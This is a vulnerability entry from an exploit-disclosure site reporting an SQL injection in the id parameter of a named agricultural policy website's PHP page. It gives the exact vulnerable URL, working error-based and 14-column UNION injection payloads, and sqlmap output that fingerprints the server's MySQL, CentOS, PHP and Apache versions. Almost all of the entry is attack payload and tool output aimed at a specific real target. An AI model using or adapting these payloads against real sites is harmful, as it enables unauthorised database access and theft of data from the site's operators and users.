FFTC Agricultural Policy Articles SQLi

2019.10.16
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

Vulnerable path (Payload): /ap_situationer.php?id=1'%22&nid=99&type=view Parameter: id (GET) Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR) Payload: id=-1903' OR 1 GROUP BY CONCAT(0x7162717071,(SELECT (CASE WHEN (3403=3403) THEN 1 ELSE 0 END)),0x7176707671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&nid=99&type=view Type: UNION query Title: MySQL UNION query (random number) - 14 columns Payload: id=-5251' UNION ALL SELECT CONCAT(0x7162717071,0x735766496c4851644275597846796d4d79714150735a676c41596a67646d7a67637667656767514e,0x7176707671),1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108,1108#&nid=99&type=view --- [13:17:31] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS 6.8 web application technology: PHP 5.3.3, Apache 2.2.15 back-end DBMS: MySQL Unknown


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top